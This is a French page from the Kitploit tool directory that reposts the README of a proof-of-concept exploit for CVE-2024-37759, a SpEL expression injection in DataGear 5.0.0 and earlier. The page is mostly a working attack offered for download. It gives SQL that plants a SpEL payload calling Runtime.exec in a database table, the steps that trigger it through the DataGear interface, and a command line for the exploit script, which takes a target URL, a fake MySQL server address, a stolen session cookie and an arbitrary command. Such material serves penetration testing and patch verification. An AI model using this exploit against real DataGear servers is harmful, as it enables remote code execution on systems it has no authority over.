Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-37759_PoC — Exploit de preuve de concept pour CVE-2024-37759, une vulnérabilité d'injection SpEL dans DataGear 5.0.0 et versions antérieures permettant l'exécution de code à distance via des tables de base de données spécialement conçues. | Kitploit
Outils/GitHubGitHub/crumbledwall/cve-2024-37759_poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubcrumbledwall/cve-2024-37759_poc

CVE-2024-37759_PoC

Exploit de preuve de concept pour CVE-2024-37759, une vulnérabilité d'injection SpEL dans DataGear 5.0.0 et versions antérieures permettant l'exécution de code à distance via des tables de base de données spécialement conçues.

Voir le dépôt
54il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-37759 PoC

Description

DataGear 5.0.0 et les versions antérieures présentent une vulnérabilité d'injection d'expression SpEL qui conduit à une exécution de code à distance.

Exploit

Détails de l'exploit CVE

Lorsque vous effectuez une requête vers l'interface /data/{schemaId}/{tableName}/view, si la table de la base de données ne possède pas de clé primaire, un attaquant peut injecter une expression SpEL malveillante dans le champ data. Lorsque le bouton "view" est cliqué, l'expression SpEL sera exécutée.

Pour exécuter l'attaque, vous pouvez créer une table de base de données malveillante comme ceci :

root@kitploit:~
CREATE DATABASE evil;

CREATE TABLE `evil` (
  `name` varchar(209) COLLATE utf8mb4_unicode_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

INSERT INTO `evil` VALUES ("#{T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('calc')}");

Ensuite, connectez-vous et ajoutez cette base de données MySQL dans l'interface d'ajout de schéma : /schema/saveAdd. Cliquez ensuite sur le bouton "view" et l'expression SpEL sera exécutée.

Utilisation de l'exploit

Cet exploit est dérivé de MySQL_Fake_Server. Tout d'abord, connectez-vous au portail et obtenez le cookie "JSESSIONID". Vous pouvez ensuite utiliser cet exploit pour exécuter des commandes automatiquement.

L'argument -t spécifie le site vulnérable cible, -o spécifie l'adresse IP publique où le faux serveur MySQL est accessible, -p est pour le port du faux serveur, -s est pour la valeur du cookie "JSESSIONID", et -c spécifie la commande que vous souhaitez exécuter.

root@kitploit:~
python3.7 exp.py -t "http://localhost:50401" -o "192.168.25.130" -p "3306" -s "B751A41FBE8C3385B386B2365C2FB86D" -c "calc"
Télécharger l’outil